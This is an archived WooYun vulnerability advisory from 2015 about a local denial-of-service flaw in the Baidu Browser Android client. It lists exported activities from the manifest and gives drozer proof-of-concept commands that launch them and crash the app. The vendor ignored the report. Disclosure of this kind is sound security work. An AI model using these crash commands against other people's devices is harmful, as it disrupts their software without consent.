当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120277

漏洞标题:百度浏览器Android客户端拒绝服务漏洞

相关厂商:百度

漏洞作者: 路人甲

提交时间:2015-06-16 16:08

修复时间:2015-09-19 16:11

公开时间:2015-09-19 16:11

漏洞类型:拒绝服务

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-21: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开

简要描述:

本地拒绝服务

详细说明:

百度浏览器Android客户端Activity组件对外暴露,导致恶意程序直接发送intent启动该Activity,组件对intent处理不当产生异常,导致应用程序进程崩溃。

漏洞证明:

#### 客户端版本,官网下载的最新版v5.7.5.0
#### AndroidManifest.xml查看配置导出的组件,如下组件存在问题,发送intent会导致客户端Crash

com.baidu.browser.qrcode.BdBarcodeActivity
com.baidu.browser.plugin.readers.entry.BdPDFReaderActivity
com.baidu.browser.plugin.readers.entry.BdUnzipActivity


<activity android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:exported="true" android:label="@string/common_app_name" android:name="com.baidu.browser.qrcode.BdBarcodeActivity" android:screenOrientation="portrait" android:taskAffinity="com.baidu.browser.bubble.search" android:theme="@android:style/Theme.NoTitleBar">
            <intent-filter>
                <action android:name="com.baidu.browser.apps.INVOKES"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
		
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|screenSize" android:icon="@drawable/logo_pdf" android:label="@string/common_app_reader" android:name="com.baidu.browser.plugin.readers.entry.BdPDFReaderActivity" android:theme="@android:style/Theme.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="file"/>
                <data android:mimeType="application/pdf"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*" android:scheme="file"/>
                <data android:pathPattern=".*\\.cbz"/>
                <data android:pathPattern=".*\\.xps"/>
                <data android:pathPattern=".*\\.pdf"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|screenSize" android:icon="@drawable/logo_unzip" android:label="@string/common_app_unzip" android:name="com.baidu.browser.plugin.readers.entry.BdUnzipActivity" android:theme="@android:style/Theme.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:mimeType="application/zip"/>
                <data android:mimeType="application/x-rar-compressed"/>
                <data android:mimeType="application/rar"/>
                <data android:mimeType="application/x-gzip"/>
                <data android:mimeType="application/7z"/>
                <data android:mimeType="application/x-7z-compressed"/>
                <data android:mimeType="application/x-tar"/>
                <data android:mimeType="application/x-bzip2"/>
                <data android:mimeType="application/vnd.ms-cab-compressed"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:host="*" android:scheme="file"/>
                <data android:pathPattern=".*\\.7z"/>
                <data android:pathPattern=".*\\.cab"/>
                <data android:pathPattern=".*\\.bz2"/>
            </intent-filter>
        </activity>


部分Crash日志

1.JPG


2.JPG


#### POC

dz> run app.activity.start --component com.baidu.browser.apps com.baidu.browser.qrcode.BdBarcodeActivity
dz> run app.activity.start --component com.baidu.browser.apps com.baidu.browser.plugin.readers.entry.BdPDFReaderActivity
dz> run app.activity.start --component com.baidu.browser.apps com.baidu.browser.plugin.readers.entry.BdUnzipActivity

修复方案:

组件应正确处理所有的intent

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-19 16:11

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无